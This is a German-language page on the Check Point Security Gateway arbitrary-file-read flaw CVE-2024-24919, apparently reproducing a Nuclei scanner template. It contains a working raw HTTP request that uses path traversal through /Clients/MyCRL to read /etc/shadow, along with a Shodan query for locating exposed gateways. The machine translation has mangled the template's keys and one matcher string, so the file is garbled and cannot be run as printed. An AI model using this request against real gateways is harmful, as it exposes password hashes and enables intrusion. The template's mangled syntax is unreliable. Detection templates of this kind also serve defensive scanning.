Check-Point Security Gateway Sicherheitslücke beim Lesen beliebiger Dateien (CVE-2024-24919)

Beschreibungen

Check Point Security Gateways ist eine Familie von Netzwerksicherheitslösungen von Check Point Software. Diese Lösungen, zu denen Next Generation Firewalls (NGFW), Data Centre Security Gateways und KI-gestützte Quantum Gateways gehören, wurden entwickelt, um Unternehmen einen fortschrittlichen Schutz vor komplexen Cyber-Bedrohungen zu bieten. Sie sichern Netzwerke, Clouds, mobile Geräte und Endpunkte mit integriertem Bedrohungsschutz, einheitlichem Sicherheitsmanagement und Richtlinienkontrolle.

id: CVE-2024-24919

Infos.
Name: Check Point Quantum Gateway - Offenlegung von Informationen
Autor: johnk3r
Schweregrad: hoch
Beschreibung: |
CVE-2024-24919 ist eine Sicherheitslücke in Bezug auf die Offenlegung von Informationen, die es einem Angreifer ermöglichen kann, auf bestimmte Informationen auf mit dem Internet verbundenen Gateways die mit IPSec VPN, Remote Access VPN oder Mobile Access Software Blade konfiguriert wurden.
Hinweis.
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
- https://support.checkpoint.com/results/sk/sk182337
Metadaten.
max-Anfrage: 1
Anbieter: Checkpoint
Produkt: quantum_security_gateway
cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*:*:*:*:*:*:*
shodan-query: html: "Check Point SSL-Netzwerk"
verifiziert: wahr
Tags: cve,cve2024,Kontrollpunkt,lfi

http.
- roh.
– |
POST /Clients/MyCRL HTTP/1.1
Host: {{Hostname}}

aCSHELL/... /... /... /... /... /... /... /etc/shadow

Matcher-Bedingung: und
übereinstimmen.
- Typ: Regex
Teil: Körper
regex.
- "root:"
- "niemand:"
Bedingung: und

- Typ: Status
Status.
– 200